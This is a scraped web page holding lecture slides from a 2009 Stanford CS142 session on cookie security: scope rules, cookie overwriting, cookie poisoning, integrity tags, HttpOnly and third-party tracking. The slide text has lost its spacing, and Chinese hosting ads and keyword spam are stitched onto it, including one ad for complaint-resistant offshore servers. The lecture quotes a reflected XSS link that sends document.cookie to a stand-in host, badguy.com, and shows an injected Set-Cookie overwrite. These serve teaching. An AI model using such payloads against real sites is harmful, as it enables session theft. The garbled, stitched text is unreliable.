overwritesphpecho

phpecho  时间:2021-05-20  阅读:()
CookieSameOriginPolicyDanBonehCS142Winter2009Monday:sessionmanagementusingcookiesSameoriginpolicy:"highlevel"Review:SameOriginPolicy(SOP)forDOM:OriginAcanaccessoriginB'sDOMifmatchon(scheme,domain,port)Today:SameOriginalPolicy(SOP)forcookies:Generallyspeaking,basedon:([scheme],domain,path)optionalscheme://domain:port/pathparamsscopeSetting/deletingcookiesbyserverDeletecookiebysetting"expires"todateinpastDefaultscopeisdomainandpathofsettingURLBrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;domain=(whentosend);path=(whentosend)secure=(onlysendoverSSL);expires=(whenexpires);HttpOnly(later)ifexpires=NULL:thissessiononlyScopesettingrules(writeSOP)domain:anydomain-suffixofURL-hostname,exceptTLDexample:host="login.
site.
com"login.
site.
comcansetcookiesforallof.
site.
combutnotforanothersiteorTLDProblematicforsiteslike.
stanford.
edupath:canbesettoanythingalloweddomainslogin.
site.
com.
site.
comdisalloweddomainsuser.
site.
comothersite.
com.
comCookiesareidentifiedby(name,domain,path)Bothcookiesstoredinbrowser'scookiejar;bothareinscopeoflogin.
site.
comcookie1name=useridvalue=testdomain=login.
site.
compath=/securecookie2name=useridvalue=test123domain=.
site.
compath=/securedistinctcookiesReadingcookiesonserver(readSOP)BrowsersendsallcookiesinURLscope:cookie-domainisdomain-suffixofURL-domain,andcookie-pathisprefixofURL-path,and[protocol=HTTPSifcookieis"secure"]Goal:serveronlyseescookiesinitsscopeBrowserServerGET//URL-domain/URL-pathCookie:NAME=VALUEExampleshttp://checkout.
site.
com/http://login.
site.
com/https://login.
site.
com/cookie1name=useridvalue=u1domain=login.
site.
compath=/securecookie2name=useridvalue=u2domain=.
site.
compath=/non-securebothsetbylogin.
site.
comcookie:userid=u2cookie:userid=u2cookie:userid=u1;userid=u2(arbitraryorder)Clientsideread/write:document.
cookieSettingacookieinJavascript:document.
cookie="name=value;expires=…;"Readingacookie:alert(document.
cookie)printsstringcontainingallcookiesavailablefordocument(basedon[protocol],domain,path)Deletingacookie:document.
cookie="name=;expires=Thu,01-Jan-70"document.
cookieoftenusedtocustomizepageinJavascriptjavascript:alert(document.
cookie)JavascriptURLDisplaysallcookiesforcurrentdocumentViewing/deletingcookiesinBrowserUICookieprotocolproblemsServerisblind:Doesnotseecookieattributes(e.
g.
secure)DoesnotseewhichdomainsetthecookieServeronlysees:Cookie:NAME=VALUEExample1:loginserverproblemsAlicelogsinatlogin.
site.
comlogin.
site.
comsetssession-idcookiefor.
site.
comAlicevisitsevil.
site.
comoverwrites.
site.
comsession-idcookiewithsession-idofuser"badguy"Alicevisitscs142hw.
site.
comtosubmithomework.
cs142hw.
site.
comthinksitistalkingto"badguy"Problem:cs142hwexpectssession-idfromlogin.
site.
com;cannottellthatsession-idcookiewasoverwrittenExample2:"secure"cookiesarenotsecureAlicelogsinathttps://www.
google.
com/accountsAlicevisitshttp://www.
google.
com(cleartext)NetworkattackercaninjectintoresponseSet-Cookie:LSID=badguy;secureandoverwritesecurecookieProblem:networkattackercanre-writeHTTPScookies!
HTTPScookievaluecannotbetrustedInteractionwiththeDOMSOPCookieSOP:pathseparationx.
com/Adoesnotseecookiesofx.
com/BNotasecuritymeasure:DOMSOP:x.
com/AhasaccesstoDOMofx.
com/Balert(frames[0].
document.
cookie);Pathseparationisdoneforefficiencynotsecurity:x.
com/AisonlysentthecookiesitneedsCookieshavenointegrity!
!
Storingsecuritydataonbrowser–Usercanchangeanddeletecookievalues!
!
Editcookiefile(FF3:cookies.
sqlite)ModifyCookieheader(FF:TamperDataextension)–Sillyexample:shoppingcartsoftwareSet-cookie:shopping-cart-total=150($)–Usereditscookiefile(cookiepoisoning):Cookie:shopping-cart-total=15($)Similartoproblemwithhiddenfields1617Notsosilly…(asof2/2000)D3.
COMPtyLtd:ShopFactory5.
8@RetailCorporation:@RetailAdgrafix:CheckItOutBaronConsultingGroup:WebSiteToolComCityCorporation:SalesCartCrestedButteSoftware:EasyCartDansie.
net:DansieShoppingCartIntelligentVendingSystems:IntellivendMake-a-Store:Make-a-StoreOrderPageMcMurtrey/Whitaker&Associates:Cart323.
0pknutsen@nethut.
no:CartMan1.
04RichMediaTechnologies:JustAddCommerce5.
0SmartCart:SmartCartWebExpress:Shoptron1.
2Source:http://xforce.
iss.
net/xforce/xfdb/4621Solution:cryptographicchecksums"value"shouldalsocontaindatatopreventcookiereplayandswapGoal:dataintegrityRequiressecretkeykunknowntobrowserBrowserServerkSet-Cookie:NAME=valueTCookie:NAME=valueTGeneratetag:T←F(k,value)Verifytag:T=F(k,value)19Example:.
NET2.
0–System.
Web.
Configuration.
MachineKeySecretwebserverkeyintendedforcookieprotectionStoredonallwebserversinsiteCreatinganencryptedcookiewithintegrity:–HttpCookiecookie=newHttpCookie(name,val);HttpCookieencodedCookie=HttpSecureCookie.
Encode(cookie);Decryptingandvalidatinganencryptedcookie:–HttpSecureCookie.
Decode(cookie);Cookietheft:basiccrosssitescripting(XSS)Example:reflectedXSSsearchfieldonvictim.
com:http://victim.
com/search.
phpterm=appleServer-sideimplementationofsearch.
php:SearchResultsResultsfor:.
.
.
echosearchtermintoresponseBadinputConsiderlink:(properlyURLencoded)http://victim.
com/search.
phpterm=window.
open("http://badguy.
comcookie="+document.
cookie)Whatifuserclicksonthislink1.
Browsergoestovictim.
com/search.
php2.
Victim.
comreturnsResultsfor…3.
Browserexecutesscript:Sendsbadguy.
comcookieforvictim.
com23SowhatWhywoulduserclickonsuchalinkPhishingemailLinkindoubleclickbannerad…manymanywaystofooluserintoclickingMANYotherformsofXSS(monday)ManydonotrequireclickingonlinksHttpOnlyCookiesIE6SP1,FF2.
0.
0.
5BrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;HttpOnlyCookiesentoverHTTP(s),butnotaccessibletoscriptscannotbereadviadocument.
cookieAlsoblocksaccessfromXMLHttpRequestheadersHelpspreventcookietheftviaXSS…butdoesnotstopmostotherrisksofXSSbugs.
(notSafari)THEEND3rdPartyCookies:usertracking3rdpartycookiesWhattheyare:UsergoestositeA.
com;obtainspagePagecontainsBrowsergoestoB.
com;obtainspageHTTPresponsecontainscookieCookiefromB.
comiscalleda3rdpartycookieTracking:UsergoestositeD.
comD.
comcontainsB.
comobtainscookiesetwhenvisitedA.
comB.
comknowsuservisitedA.
comandD.
comCanweblock3rdpartycookiesIEandSafari:blockset/writeIgnorethe"Set-Cookie"HTTPheaderfrom3rdpartiesSitesetscookieasa1stparty;willbegivencookiewhencontactedasa3rdpartyEnabledbydefaultinIE7FirefoxandOpera:blocksend/readAlwaysimplement"Set-Cookie",butneversendcookiesto3rdpartyBreakssess.
mgmt.
atseveralsites(offbydefault)Effectivenessof3rdpartyblockingIneffectiveforimprovingprivacy3rdpartycanbecomefirstpartyandthensetcookieFlashcookiesnotcontrolledbybrowsercookiepolicyIE8InPrivatebrowsingandChromeincognitoUponexit,deleteallbrowserstatecollectedwhileinprivatebrowsing

Gigsgigscloud($9.8)联通用户优选日本软银VPS

gigsgigsCloud日本东京软银VPS的大带宽配置有100Mbps、150Mbps和200Mbps三种,三网都走软银直连,售价最低9.8美元/月、年付98美元。gigsgigscloud带宽较大延迟低,联通用户的好选择!Gigsgigscloud 日本软银(BBTEC, SoftBank)线路,在速度/延迟/价格方面,是目前联通用户海外VPS的最佳选择,与美国VPS想比,日本软银VPS延迟更...

提速啦母鸡 E5 128G 61IP 1200元

提速啦(www.tisula.com)是赣州王成璟网络科技有限公司旗下云服务器品牌,目前拥有在籍员工40人左右,社保在籍员工30人+,是正规的国内拥有IDC ICP ISP CDN 云牌照资质商家,2018-2021年连续4年获得CTG机房顶级金牌代理商荣誉 2021年赣州市于都县创业大赛三等奖,2020年于都电子商务示范企业,2021年于都县电子商务融合推广大使。资源优势介绍:Ceranetwo...

VirtVPS抗投诉瑞士VPS上线10美元/月

专心做抗投诉服务器的VirtVPS上线瑞士机房,看中的就是瑞士对隐私的保护,有需要欧洲抗投诉VPS的朋友不要错过了。VirtVPS这次上新的瑞士服务器采用E-2276G处理器,Windows/Linux操作系统可选。VirtVPS成立于2018年,主营荷兰、芬兰、德国、英国机房的离岸虚拟主机托管、VPS、独立服务器、游戏服务器和外汇服务器业务。VirtVPS 提供世界上最全面的安全、完全受保护和私...

phpecho为你推荐
对开展广场舞活动所产生的噪音,I:\Sam-research\QEF\Publications\ConferenceIntentsandroid支持ipad支持ipadcss3按钮HTML中,怎么表示一个图片按钮googleadsense如何通过Google adsense???css选择器css3的选择器有哪些?ipad上不了网平板电脑 能连接网络不能上网迅雷下载速度迅雷限制下载速度要设置多少
网站域名备案 免费申请网站域名 免费个人博客 tk域名 网站实时监控 速度云 四核服务器 新世界服务器 银盘服务 raid10 登陆空间 中国电信网络测速 英雄联盟台服官网 lamp架构 攻击服务器 hdsky websitepanel web是什么意思 alexa搜 更多